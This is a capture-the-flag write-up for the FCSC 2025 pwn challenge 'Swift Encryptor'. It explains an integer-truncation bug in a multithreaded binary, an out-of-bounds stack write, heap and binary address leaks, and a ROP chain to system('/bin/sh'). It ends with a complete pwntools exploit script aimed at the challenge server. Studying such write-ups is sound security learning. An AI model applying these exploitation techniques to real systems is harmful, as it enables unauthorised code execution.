FCSC 2025 - Swift Encryptor - Pwn

13 minute read

FCSC 2025 - Write-up - Pwn - Swift Encryptor

Description

!!! New !!! Ultra-modern encryption service: Military grade post-quantum cryptographic algorithms! Ultra-fast multi-threading! Protection against memory corruption!

Author : Quanthor_ic

Solution

Context

For this challenge we have the source code and dockerfile. We need to exploit a userland binary ELF-64 on x64 architecture.

The program is multithreaded :

int main(void) {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);

  system("BANNER='Swift Encryptor'; command -v toilet > /dev/null && toilet -f emboss -F border $BANNER || echo \"\n$BANNER\n\"");

  create_thread(TID_INTERFACE, &interface_thread);
  create_thread(TID_DECODER, &decoder_thread);
  create_thread(TID_SPLITTER, &splitter_thread);
  create_thread(TID_ENCODER, &encoder_thread);

  pthread_join(MAIN_THREADS[TID_INTERFACE]->pthread, NULL);

  destroy_thread(TID_INTERFACE);
  destroy_thread(TID_DECODER);
  destroy_thread(TID_SPLITTER);
  destroy_thread(TID_ENCODER);

  return 0;
}

The first thing to notice here is the presence of the system function, which implies the function will be in the GOT of the program. So, for the exploit, a libc leak may not be necessary, only a binary leak.

The program gets base64 input, decodes it, encrypts it, encodes it in base64 too and send it to the user in a while loop.

Each part of the process is done by a thread. For example, the interface thread gets the input and send it to the decoder thread :

// [...]
  while (thread->stop == 0) {
    fputs("> ", stdout);
    if (fgets(input, MAX_INPUT_SIZE, stdin)) {
      if (input[0] == '\n') {
        printf("[%s] %s\n", THREAD_NAMES[TID_INTERFACE], ERRMSG);
        continue;
      }

      size = strlen(input);
      if (input[size-1] == '\n') {
        input[size-1] = 0;
      } else {
        size ++;
      }

      printf("[%s] %s\n", THREAD_NAMES[TID_INTERFACE], OKMSG);

      s_msg = create_msg(TID_INTERFACE, TID_DECODER, size);
      memcpy(s_msg->data, input, size);
      send_msg(s_msg);

      bool wait = true;
      while (wait) {
        r_msg = recv_msg(thread);
        if (r_msg != NULL) {
          if (r_msg->data[0] == 1) {
            wait = false;
          }
          printf("[%s] %s\n", THREAD_NAMES[r_msg->src], r_msg->data+1);
          free(r_msg);
        }
      }
    } else {
      break;
    }
  }
// [...]

The decoder decodes the data and send it to the splitter thread :

// [...]
  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      enc_size = strlen(r_msg->data);
      if (enc_size > 0) {
        dec_size = (enc_size * 3) / 4;
        dec = malloc(dec_size);
        int res_size = b64decode(r_msg->data, enc_size, dec, dec_size);

        if (res_size < 0) {
          s_msg = create_msg(TID_DECODER, TID_INTERFACE, sizeof(ERRMSG)+2);
          s_msg->data[0] = 1;
          strncpy(s_msg->data+1, ERRMSG, sizeof(ERRMSG)+1);
          send_msg(s_msg);
        } else {
          s_msg = create_msg(TID_DECODER, TID_INTERFACE, sizeof(OKMSG)+2);
          s_msg->data[0] = 0;
          strncpy(s_msg->data+1, OKMSG, sizeof(OKMSG)+1);
          send_msg(s_msg);

          s_msg = create_msg(TID_DECODER, TID_SPLITTER, res_size+2);
          *((u_short*)s_msg->data) = res_size;
          memcpy(s_msg->data+2, dec, res_size);
          send_msg(s_msg);
        }
        free(dec);
      }
      free(r_msg);
    }
// [...]

Here is the splitter_thread code part :

// [...]
  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      data_size = *((u_short*)r_msg->data);
      if (data_size != 0) {

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          destroy_thread(worker_id);
        }

        WORKERS_COUNT = 0;
        if (WORKERS != NULL) {
          free(WORKERS);
        }

        destroy_thread(TID_JOINER);

        WORKERS_COUNT = (data_size-1)/BLOCK_SIZE + 1;
        WORKERS = malloc(WORKERS_COUNT * sizeof(struct thread*));

        create_thread(TID_JOINER, &joiner_thread);

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          create_thread(worker_id, &encryptor_thread);
        }

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          s_msg = create_msg(TID_SPLITTER, worker_id, BLOCK_SIZE);
          if (BLOCK_SIZE <= data_size) {
            memcpy(s_msg->data, r_msg->data + 2 + i*BLOCK_SIZE, BLOCK_SIZE);
          } else {
            memcpy(s_msg->data, r_msg->data + 2 + i*BLOCK_SIZE, data_size); 
          }
          data_size -= BLOCK_SIZE;
          send_msg(s_msg);
        }

        s_msg = create_msg(TID_SPLITTER, TID_INTERFACE, sizeof(OKMSG)+2);
        s_msg->data[0] = 0;
        strncpy(s_msg->data+1, OKMSG, sizeof(OKMSG)+1);
        send_msg(s_msg);

        free(r_msg);
      }
    }
  }
// [...]

To send and received messages, the program used create_msg, send_msg and recv_msg. The create_msg function takes the source id, destination id and size of the message. There is a queue of messages per thread.

The splitter thread creates encryptor_thread for each 16 bytes of decoded data and sends each one. Here is the encryptor thread :

void encrypt(char* dec, char* enc) {
  char secret_key[] = "\x5e\x5f\xc3\x3d\xb9\x27\x6f\x6e\xd8\xd5\xce\xeb\x1e\x0e\x75\x8d";
  for (u_int i = 0; i < BLOCK_SIZE; i++) {
    enc[i] = dec[i] ^ secret_key[i];
  }
}

void* encryptor_thread(void* arg) {
  char enc[BLOCK_SIZE] = "";
  struct msg* s_msg;
  struct msg* r_msg;

  struct thread* thread = (struct thread*)arg;

  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      encrypt(r_msg->data, enc);

      s_msg = create_msg(thread->id, TID_JOINER, BLOCK_SIZE+2);
      *((u_short*)s_msg->data) = thread->id - MAIN_THREADS_COUNT;
      memcpy(s_msg->data+2, enc, BLOCK_SIZE);
      send_msg(s_msg);

      free(r_msg);
      return NULL;
    }
  }
  return NULL;
}

The splitter also creates a joiner thread :

void* joiner_thread(void* arg) {
  struct msg* s_msg;
  struct msg* r_msg;

  struct thread* thread = (struct thread*)arg;

  u_int joined_count = 0;
  u_int total_size = WORKERS_COUNT * BLOCK_SIZE;
  u_char* join_buf = alloca(total_size);
  memset(join_buf, 0, total_size);

  while (thread->stop == 0) {
    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      u_short offset = *((u_short*)r_msg->data);
      memcpy(join_buf + offset * BLOCK_SIZE, r_msg->data+2, BLOCK_SIZE);
      joined_count++;

      free(r_msg);

      if (joined_count == WORKERS_COUNT) {
        s_msg = create_msg(TID_JOINER, TID_INTERFACE, sizeof(OKMSG)+2);
        s_msg->data[0] = 0;
        strncpy(s_msg->data+1, OKMSG, sizeof(OKMSG)+1);
        send_msg(s_msg);

        total_size = WORKERS_COUNT * BLOCK_SIZE;
        s_msg = create_msg(TID_JOINER, TID_ENCODER, total_size+2);
        *((u_short*)s_msg->data) = total_size;
        memcpy(s_msg->data+2, join_buf, total_size);
        send_msg(s_msg);
        return NULL;
      }
    }
  }
  return NULL;
}

This joiner thread received every 16 bytes blocks of the encryptor thread, it places the encryption result in a result buffer, and when all data is read, it transmits it to the encoder thread which transmits to the interface, which prints the result.

To finish the interface thread prints the result.

Here is a little schema to summarise :

Vulnerability

There is no evident vulnerabilities, we could try to send big payload to see if base64 encoding/decoding process or some other stuff crash.

pld = b"B" * 0x5000
pld = base64.b64encode(pld)[0:0x2000]

We get a nice crash, in the base64 encode function, the zone accessed is unmapped, interesting, might be an overflow or something similar.

We need to have a breakpoint to check the arguments :

The source size is 0x4242 (BB), our input. So we control the size passed to base64 encode ? WTF.

Let’s review the source code and do some debugging. The data is not encrypted (xor) by the encryptor thread, strange, if we look closer in the splitter function there is an important detail.

        for (u_int i = 0; i < WORKERS_COUNT; i++) {
          worker_id = MAIN_THREADS_COUNT+i;
          s_msg = create_msg(TID_SPLITTER, worker_id, BLOCK_SIZE);

Each message is sent in encryptor thread by their ID (worker_id). But here is the create_msg signature :

struct msg* create_msg(u_char src, u_char dst, u_int size)

The destination id is a u_char, stored in one byte. We could confirm the id sends to the function is cast on one byte by the assembly. But i variable is stored on 32 bits and WORKERS_COUNT variable is stored on 32 bits and can be greater than 0xff.

There is a clear integer overflow vulnerability with the cast from 32 bits to 8 bits.

In IDA :

The movzx eax, al do the type casting, in decompiler view we could also see the unsigned __int8 cast.

What are the ids of the threads :

#define TID_INTERFACE 0
#define TID_DECODER 1
#define TID_SPLITTER 2
#define TID_JOINER 3
#define TID_ENCODER 4

In our case, the value to send to encoder is 4. It means we send a message from splitter to encoder, which is not normal in the real process.

This vulnerability allows us to send arbitrary messages (of 16 bytes) to each other thread. Because i iterate over all the id so one message will be sent to each thread.

We could use the integer overflow multiple times to send a multiple arbitrary message to other threads.

Exploit - Abuse of arbitrary message sending

Now our goal is to find useful behaviour after thread message reception to gain more primitives, read and write.

The joiner thread looks like a great target to write data :

    r_msg = recv_msg(thread);
    if (r_msg != NULL) {
      u_short offset = *((u_short*)r_msg->data);
      memcpy(join_buf + offset * BLOCK_SIZE, r_msg->data+2, BLOCK_SIZE);
      joined_count++;

There is an out of bound write possibility.

The offset is passed in the first two bytes of the messages. The join_buf variable is on the stack, allocated by alloca, which is a sub rsp, size . The size is the total of data the thread is going to receive. (Total data block encrypted.)

By controlling offset, we can obviously overwrite the return address of the thread by setting offset to a greater value than the alloca size.

But now we need a leak of address to progress in the exploit.

The base64 encode functionnality looks good to get one :

      dec_size = *((u_short*)r_msg->data);
      if (dec_size > 0) {
        enc_size = (((dec_size - 1) / 3) + 1) * 4 + 1;
        enc = malloc(enc_size);
        int res_size = b64encode(r_msg->data+2, dec_size, enc, enc_size);

The size is the two first bytes of the messages, like we’ve seen before we control it, this is the source size for the data, the encoded size is calculated from it.

If we set a big size in entry, we could leak data after our message. Our message is allocated in the heap.

We set the length to 0x100 for example. (Those 2 bytes are used as length with the message sent to encoder thread as we explain before)

pld = b"A"*0xff0 + p64(0x100)

pld = base64.b64encode(pld)[0:0x2000]

sla(b"> ", pld)
leak = base64.b64decode(rcu(b">").split(b"\n")[-2].split(b" ")[1])

print(leak)

We get some leaks :

By checking in GDB we see there are some heap pointers left and we leak them. Each run produces a bit different results, maybe because they are multiple operations between threads and they are not executed at the same time at every run.

With some run, we could see we have the possibility to leak a pointer of a simple linked list in the heap (probably tcache or fastbin) which is xor and shifted with a heap pointer with the safe linking protection. But if we leak the last element, the next element is equal to 0 so we leak heap pointer/base of the thread.

We could send a big size and play with our input characters which are placed on the heap to retrieve our leaks more easily.

But we don’t have libc or binary leak, binary leak to call system function.

How to do it ?

An idea was to abuse of the joiner thread. Because join_buf alloca pointer is saved on the stack, if we could overwrite it, we could arbitrary write and read in another place. Arbitrary write because the message received by joiner is memcpy to it, and arbitrary read because when all the data is received, the data is encoded and print.

There are pointers left on the heap on .text before our leak position, if we set join_buf before our heap leak we may leak them.

The thing is we need to overwrite joined_count. This field is the message counter received to know if all data is received. But because of the vulnerability, some messages didn’t go to encryptor and joiner thread, so the counter is less than WORKERS_COUNT (which contains the total block number). With the out of bound write, we could overwrite it to set it to a good value. The thing is we overwrite 16 bytes of data (because there are 2 bytes of length), and the field after joined_count is the thread pointer, which contains the stop field, to know if the thread needs to stop. Because we overwrite it, the thread crash by the dereference. If the value is directly good, it returns and there is no crash.

Because yes, we need to overwrite joined_count before join_buf, because the out of bound write is based on join_buf.

Actually, this technique may work because if there are two null bytes at the end of the fake thread pointer. We could overwrite only 6 bytes of the thread pointer and make it points to a heap value. But during the resolution I failed to do it (late night scripting x)) and try another idea.

Another idea was to play with allocations to create and leak more data in the heap. And actually, by sending a large amount of data with multiple messages, they are some encryptor function pointer which are left in the heap with our base64 encode leak. They are set by the threads creation. We need to do some search pattern to leak them every time.

So we have a leak, next we need to overwrite the return address of joiner thread with our ROP.

The only trick here is to have a constant “/bin/sh” value argument for system call. To do this we can use the technique mentioned above to arbitrary write. Because we leak base binary address, we could set join_buf to BSS and write “/bin/sh” to it.

Like this (with one message) :

def write_binsh():
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        0xfe0:  p16(0x2440//16) + p64(exe.address+0x50c0)[:-2] + p64(0),  # joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        0x1fe0:  p16((0x0)) + b"C"*4+b"/bin/sh\x00",
        0x1ff0: p64(0x0),  # encoder
    }, filler=b"B",length=0x3000)

    pld = base64.b64encode(pld)[0:0x3000]
    sl(pld)
    rcu(b">")

The first joiner message set join_buf, and the next joiner message (by using the integer overflow id again) write at offset 0, our message (with “/bin/sh”)

To get the shell here it is :

def shell(pop_rdi):
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        0xfe0:  p16(0x3060//16) + p64(0xdead) + p64(pop_rdi)[:-2], #joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        0x1fe0:  p16(0x3070//16) + p64(binsh) + p64(ret)[:-2], #joiner
        0x1ff0:  p64(0x0) + p64(0x0),  # encoder

        0x2fd0: p64(0x0)*2,  # splitter
        0x2fe0:  p16(0x3080//16) + p64(system) + p64(system)[:-2], #joiner
        0x2ff0:  p64(0x0),  # encoder

    }, filler=b"B")

    pld = base64.b64encode(pld)
    print(len(pld))
    sl(pld)

We set the offset to out of bound the alloca allocation and overwrite return address (starting to 0x3060). We use a “pop rdi; ret” gadget to set binsh pointer value to it, return to system and get a shell (don’t forget the ret gadget for the movaps issue).

We get the shell when all data is read and when the joiner thread is killed (it returns normally) by the splitter.

Some buffering problems but it works :)

Conclusion

It was a very nice challenge, it’s not common to see pwn challenge involving thread stuff and with so many-one. The vulnerability was tricky and gives a very original primitive ! Thanks to Quanthor_ic for the challenge !

Bonus

I didn’t mention it but the challenge was a bit hard to debug, there were many running thread and my gef was laggy. I used a lot of conditional breakpoints to skip the calls I didn’t want : break *0x555555555690 if $rsi == 0

In this case we break on send_msg call and if $rsi is equal to 0 the integer overflow occurs. We can be based on this to see at which step of the exploit we are.

Full script

Here is the full exploit script with a bit of cleaning :

#!/usr/bin/env python3
from pwn import *
import base64
import time

"""

"""
context.terminal = ["tmux", "new-window"]

exe = ELF("./swift-encryptor_patched")
# rop = ROP([bin,libc])

context.binary = exe
io = None

def one_gadget(filename, base_addr=0):
    return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l0', filename]).decode().split(' ')]


def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val): info(name+" = %#x" % val)
def sla(delim, line): return io.sendlineafter(delim, line)
def sl(line): return io.sendline(line)
def rcu(delim): return io.recvuntil(delim)
def rcv(number): return io.recv(number)
def rcvl(): return io.recvline()


def conn():
    global io
    if args.GDB:
        io = gdb.debug([exe.path], gdbscript='''
        #init-pwndbg
        init-gef
        #decompiler connect ida --host 127.0.0.1 --port 3662
        c
        ''')
    elif args.REMOTE:
        io = remote("fcsc.fr", 2104)
    else:
        io = process([exe.path])
    return io


conn()

def leak_base():
    pld = flat(
        {
            0xfd0: p64(0x10)*2, #
            0xfc0: p64(0x0)*2, 
            0xfd0: p64(0x20) + p64(0x0),  # splitter
            0xfe0: p64(0x10)*2, #
            0xff0:  p64(0x100) + p64(0x0),  # encoder
            
            0x1ff0: p64(0x1),  # encoder
        }, filler=b"A")+ b"B"*30

    pld2 = flat(
        {
            0xfd0: p64(0x10)*2, #
            0xfc0: p64(0x0)*2, 
            0xfd0: p64(0x20) + p64(0x0),  # splitter
            0xfe0: p64(0x10)*2, #
            0xff0:  p64(0x4000) + p64(0x0),  # encoder
        }, filler=b"A")+ b"B"*30

    pld = base64.b64encode(pld)
    pld2 = base64.b64encode(pld2)

    sla(b"> ", pld)
    time.sleep(0.2)

    sla(b"> ",pld)
    time.sleep(0.2)
    sla(b"> ",pld2)
    time.sleep(0.5)
    rcu(b">")


    for i in range(30):
        time.sleep(0.2)
        sl(b"a")
        leak = rcu(b">")
        print(leak)
        if len(leak)>0x200:
            break

    print(leak)
    print(leak.split(b"\n")[-2])
    leak = base64.b64decode(leak.split(b"\n")[-2].split(b" ")[1])
    print(leak)

    pos = leak.find(b"\x20\x01\x00\x00\x00\x00\x00\x00"+b"\x84\x00\x00\x00\x00\x00\x00\x00")

    leak_text = u64(leak[pos+24:pos+32]) # encryptor_thread
    print(hex(leak_text))

    leak_text-0x2119

    return leak_text-0x2119 


def write_binsh():
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        0xfe0:  p16(0x2440//16) + p64(exe.address+0x50c0)[:-2] + p64(0),  # joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        0x1fe0:  p16((0x0)) + b"C"*4+b"/bin/sh\x00",
        0x1ff0: p64(0x0),  # encoder
    }, filler=b"B",length=0x3000)

    pld = base64.b64encode(pld)[0:0x3000]
    sl(pld)
    rcu(b">")

def shell(pop_rdi):
    pld = flat(
    {
        0xfd0: p64(0x0)*2,  # splitter
        0xfe0:  p16(0x3060//16) + p64(0xdead) + p64(pop_rdi)[:-2], #joiner
        0xff0:  p64(0x0) + p64(0x0),  # encoder

        0x1fd0: p64(0x0)*2,  # splitter
        0x1fe0:  p16(0x3070//16) + p64(binsh) + p64(ret)[:-2], #joiner
        0x1ff0:  p64(0x0) + p64(0x0),  # encoder

        0x2fd0: p64(0x0)*2,  # splitter
        0x2fe0:  p16(0x3080//16) + p64(system) + p64(system)[:-2], #joiner
        0x2ff0:  p64(0x0),  # encoder

    }, filler=b"B")

    pld = base64.b64encode(pld)
    print(len(pld))
    sl(pld)

exe.address = leak_base()
#exe.address = 0x555555554000

print(hex(exe.address))

# pause()

write_binsh()

binsh = exe.address+0x50c0+4

pop_rdi = exe.address + 0x00000000000020ad # pop rdi ; ret
ret = exe.address + 0x000000000000101a
system = exe.sym["system"]

#pause()
shell(pop_rdi)

io.interactive()